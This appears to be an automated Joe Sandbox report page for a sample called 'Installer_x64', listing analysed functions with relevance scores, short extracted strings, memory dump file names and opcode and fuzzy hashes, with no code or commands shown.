Instruction ID: 420a00f129dc88275a4891d25c14535247cbab4e7363a9bc2a2543d7cfe8c333
Opcode Fuzzy Hash: 7434599c1214809aedf1089a73b70fba422e432ea8e9d93c90f431a6119cc987
Instruction Fuzzy Hash: F551E3706193828BDB198B29C4B0773BBA19F53308F28D49CD5D78F692D67AD506C750

Function 0BCAF293 Relevance: 2.8, Strings: 2, Instructions: 254COMMON

Download Yara Rule

Strings

';/8, xrefs: 0BCAFB88
&8nu, xrefs: 0BCAFAD8

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: &8nu$';/8
API String ID: 0-3660093508
Opcode ID: 22ff16deb93ce0db97b19f8418e4bfca489f177bedb5b0ea9c3927d0b5eea990
Instruction ID: 1e15895a893aaa7ae2a95067df24ab178032a24b12f6a0acde85b56a6418e09b
Opcode Fuzzy Hash: 22ff16deb93ce0db97b19f8418e4bfca489f177bedb5b0ea9c3927d0b5eea990
Instruction Fuzzy Hash: 9B51D0B46193928BEB2A8B25C4B0773BBA19F53308F28C49CD4D78F692D67AD506C750

Function 0BCAFA53 Relevance: 2.8, Strings: 2, Instructions: 253COMMON

Download Yara Rule

Strings

';/8, xrefs: 0BCAFB88
&8nu, xrefs: 0BCAFAD8

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: &8nu$';/8
API String ID: 0-3660093508
Opcode ID: d044e15f063659a0cdd47b29a92ac4c56d8b9fbc1ab3b9fb3b8e03c8cdbeb97e
Instruction ID: 6f91fec61e2ff2626d01c7e375c7dd84f70c57e02db6247b4bff517b9e15c794
Opcode Fuzzy Hash: d044e15f063659a0cdd47b29a92ac4c56d8b9fbc1ab3b9fb3b8e03c8cdbeb97e
Instruction Fuzzy Hash: 0C5103746193828BEB2A8B3980B0773BBA09F53308F28C09CD4D38F692D67AC506C754

Function 0BCAF33A Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

';/8, xrefs: 0BCAFB88
&8nu, xrefs: 0BCAFAD8

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: &8nu$';/8
API String ID: 0-3660093508
Opcode ID: 978f28e815aff0013e8650779e01bc456d9d1c4a1da89d42cae8315af5541468
Instruction ID: a61ad26eb734c270fe03d9488b317a234b8894f3d5e2cedb6739178996276ddc
Opcode Fuzzy Hash: 978f28e815aff0013e8650779e01bc456d9d1c4a1da89d42cae8315af5541468
Instruction Fuzzy Hash: 0951F2A46093828BDB1A8F25C4B0773BFA19F63308F28949CD4D38F792D67A8406C754

Function 0BC8E880 Relevance: 2.7, Strings: 2, Instructions: 204COMMON

Download Yara Rule

Strings

{, xrefs: 0BC8E8A0
<, xrefs: 0BC8EAA5

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: <${
API String ID: 0-3826224372
Opcode ID: 235bb8e8a26408d6d929bb070bdd2ec25ddb28e5c144b1cd866b026d910a7d71
Instruction ID: b8978b4bbb0f3df6326fc13a2582f7da60e90cdab9484ede31fc2760c19f01fe
Opcode Fuzzy Hash: 235bb8e8a26408d6d929bb070bdd2ec25ddb28e5c144b1cd866b026d910a7d71
Instruction Fuzzy Hash: 8171197291C3908FD7309B7884457EFBBD0AB85728F094E3DD8E9D7382D67889018752

Function 0BC9AF4C Relevance: 2.7, Strings: 2, Instructions: 175COMMON

Download Yara Rule

Strings

Z, xrefs: 0BC9B076
^_XY, xrefs: 0BC9B1A8, 0BC9B1B4

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: Z$^_XY
API String ID: 0-74525926
Opcode ID: 2d3d25ac09cb8919eb5a3781882a811dfe2b9658134273dd39931dfee49dace0
Instruction ID: feab51aa1e5e5aaeb9653775113e166a2c4b4051d5c80125934e968e499d2c48
Opcode Fuzzy Hash: 2d3d25ac09cb8919eb5a3781882a811dfe2b9658134273dd39931dfee49dace0
Instruction Fuzzy Hash: 7D6135759593908BD308CF14C8A07AFBBF2ABD6304F08895CF0D55B395C7B98506CB82

Function 0BC9B1E4 Relevance: 2.7, Strings: 2, Instructions: 175COMMON

Download Yara Rule

Strings

Z, xrefs: 0BC9B316
^_XY, xrefs: 0BC9B448, 0BC9B454

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: Z$^_XY
API String ID: 0-74525926
Opcode ID: 400b2975456749a9be8f2773e3532479306384a0a3d91cc7ddd67c202fa46748
Instruction ID: 0f147d22810c3a8620c79924952876f65c8b0187f37818a138ed5cc689f98c0b
Opcode Fuzzy Hash: 400b2975456749a9be8f2773e3532479306384a0a3d91cc7ddd67c202fa46748
Instruction Fuzzy Hash: 3751F1715593909BD718CF15D8A47AFBBF2ABD6304F08495CF0C29B395C7B9850ACB82

Function 0BC8C450 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

$p%v, xrefs: 0BC8C49F
wt$p%v, xrefs: 0BC8C500

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: $p%v$wt$p%v
API String ID: 0-39953908
Opcode ID: ca22f657da0b72b0d37e5e8d171556ecaee74557d05777cf35122b73011b0267
Instruction ID: 580ff7e007d4b734a4a8be5b0dd79e11eae9addc620e6fce9e17dc798102da7c
Opcode Fuzzy Hash: ca22f657da0b72b0d37e5e8d171556ecaee74557d05777cf35122b73011b0267
Instruction Fuzzy Hash: 0321DF75A80B418BDB20CF68DC90B6BBBF1EF99314F15895CD59267680C3B0AA04CB88

Function 0BCADAA0 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 0BCADD88

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: c4548511521ab22bde244529040f40b0c9487b48868c5fb18a71394137334e9d
Instruction ID: ed45ccaec58551bd27bbb6fda8cb8e3d908e31107818ae124a3973cbad143fa6
Opcode Fuzzy Hash: c4548511521ab22bde244529040f40b0c9487b48868c5fb18a71394137334e9d
Instruction Fuzzy Hash: 9BC13BB2E293025FD715CF24C89076BB7E9AF85218F18853DE8A787781E734DA44C791

Function 0BCC31C0 Relevance: 1.6, Strings: 1, Instructions: 352COMMON

Download Yara Rule

Strings

`abc, xrefs: 0BCC31F0

Memory Dump Source

Source File: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: `abc
API String ID: 0-3490164943
Opcode ID: b35c13cacb734394a52ff34ff0489519f4a2266178f6a28909abef86aaadd406
Instruction ID: 8cb9d62285c8d11e9cfc67d1195e6c101792bf323f0c048b8346410ae5adbf6f
Opcode Fuzzy Hash: b35c13cacb734394a52ff34ff0489519f4a2266178f6a28909abef86aaadd406
Instruction Fuzzy Hash: 7DB135716183418FD718CF69D8A072FB7E2FFE8314F19C52CE4968B291DB7499058B8A

Function 0BCB48C0 Relevance: 1.6, Strings: 1, Instructions: 316COMMON

Download Yara Rule

Strings

U, xrefs: 0BCB4A57

Memory Dump Source

Source File: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 8966d50da5a37ec0023c324ab0dfedb76a43ca0b1e4f73930785c39ebb1efedb
Instruction ID: 9405d32a9d9a3f95e5293136dcbb9f42d6b11e0f437f336ec5d3411f96d04f72
Opcode Fuzzy Hash: 8966d50da5a37ec0023c324ab0dfedb76a43ca0b1e4f73930785c39ebb1efedb
Instruction Fuzzy Hash: CDA12A37B5DA9007D32C967D5C623AEB9834BD6230F2EC77DA5F5873D2D9A988024240

Function 0BCAE390 Relevance: 1.6, Strings: 1, Instructions: 315COMMON

Download Yara Rule

Strings

18;F, xrefs: 0BCAE60C

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: 18;F
API String ID: 0-3769040749
Opcode ID: 5e789dd8345d93466f131bd52b66e30cdc2e2f4b9384f9b96e6abe6834c32904
Instruction ID: cdb28aac1d0139ea6fc66849a0ae0ff2191c3eb763b32c0d53ba144730b0220b
Opcode Fuzzy Hash: 5e789dd8345d93466f131bd52b66e30cdc2e2f4b9384f9b96e6abe6834c32904
Instruction Fuzzy Hash: D1C17AB4805B819FD331AF3985567A3BFF0AB06300F504A5EE4EB4B695E734600ACB96

Function 0BCC3B70 Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

xyz{, xrefs: 0BCC3C0B, 0BCC3CA3

Memory Dump Source

Source File: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: xyz{
API String ID: 0-3337108856
Opcode ID: c037d4fb432c2ea7b03464e87aa99d4dfe41b81802e66fe57da87d86dd5d538e
Instruction ID: b6e794cd8787ed2a5c72c8359bad8f86ea0806f699d84e3de47466cc70ff31c9
Opcode Fuzzy Hash: c037d4fb432c2ea7b03464e87aa99d4dfe41b81802e66fe57da87d86dd5d538e
Instruction Fuzzy Hash: BC812671A193418BD314CF29E880B6BB7A2EBD5324F18C63CE8955B3D5DB31C9098796

Function 0BC889D0 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

[Z, xrefs: 0BC88A17

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: [Z
API String ID: 0-2468884106
Opcode ID: 91b76771b20d5732598bb8b3eabaf6b977984f99c75b0f32b2ce836ebd3e7f1e
Instruction ID: 8b9166cc86e3bb846b3ca687419ca40340dd55ee1d890ec2b64d547d4a1c0622
Opcode Fuzzy Hash: 91b76771b20d5732598bb8b3eabaf6b977984f99c75b0f32b2ce836ebd3e7f1e
Instruction Fuzzy Hash: C771292165D3D14AC3228F3984603B7FFE09FD7644F4C46ADD4D15B6C2C32A894B87A6

Function 0BC98BA2 Relevance: 1.5, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

gfff, xrefs: 0BC98CEE

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 137dae1cf3f7bcf3a3cdcbab3f5c0107a66312d2e7ef0097918b6ac11f572d85
Instruction ID: 9eaccf77796987b80850d80077490ba1b0548f342fefc52cb444c04bbc7dbd94
Opcode Fuzzy Hash: 137dae1cf3f7bcf3a3cdcbab3f5c0107a66312d2e7ef0097918b6ac11f572d85
Instruction Fuzzy Hash: DBA16BB29183419FEB24CF28D49976BBBD2ABD6340F48492DE4E9C7382D634DD05C792

Function 0BC853D0 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

,, xrefs: 0BC85506

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 5f02bdf1699e792d3ae5bd54a91f209061a758fa931a699947de96154548f213
Instruction ID: cac38304d74191b436c0ffa961bf2989f47431a42a3a7ceec700561542fb31d5
Opcode Fuzzy Hash: 5f02bdf1699e792d3ae5bd54a91f209061a758fa931a699947de96154548f213
Instruction Fuzzy Hash: 3BB14C711093819FD321DF58C88061BFBE1AFA9608F444E2DF5D997382D671EA18CBA7

Function 0BCA28A0 Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

L<, xrefs: 0BCA2975

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: L<
API String ID: 0-846884465
Opcode ID: 30437f5fc74c2cbf372eaceace08bcccf3e3f1434491f609e99044f7584035b1
Instruction ID: b4fc8be0789e1ed8c0429bd2890d0679804430558adaf250570c96a58fd20793
Opcode Fuzzy Hash: 30437f5fc74c2cbf372eaceace08bcccf3e3f1434491f609e99044f7584035b1
Instruction Fuzzy Hash: 87611772A242168BCB249F28CC9177773E1EF85728F08952CE8968F695FB39E905C351

Function 0BC96608 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

gfff, xrefs: 0BC967A8

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 676608695d9b532c164e105101aa4c0b0d8e106fc0b71e386dd92015009639cd
Instruction ID: 10a0efa1e1d9c4006de0fc48cdb1a5d384a99625b7f3d30d56f17d8b3f29851b
Opcode Fuzzy Hash: 676608695d9b532c164e105101aa4c0b0d8e106fc0b71e386dd92015009639cd
Instruction Fuzzy Hash: 1D717576A642114BE72CCF28DC167BB76D2EBC5310F19C63DD896CB3D5EA3899068780

Function 0BCAA548 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

T*, xrefs: 0BCAA55B

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: T*
API String ID: 0-1223053101
Opcode ID: 14c34cb27fca3deee744294d9d68f0acea065af535b7d1c3be559aae468295a0
Instruction ID: 07538f8e767d86565ffa614b0b4f45864dd28a8c70b46aa919e36a413cfeefdc
Opcode Fuzzy Hash: 14c34cb27fca3deee744294d9d68f0acea065af535b7d1c3be559aae468295a0
Instruction Fuzzy Hash: 4B819472E006258FDB28CF68D85139EF7B1FB84304F1A866DC85AAB745D774A945CBC0

Function 0BCB1ADE Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

0, xrefs: 0BCB1DAD

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

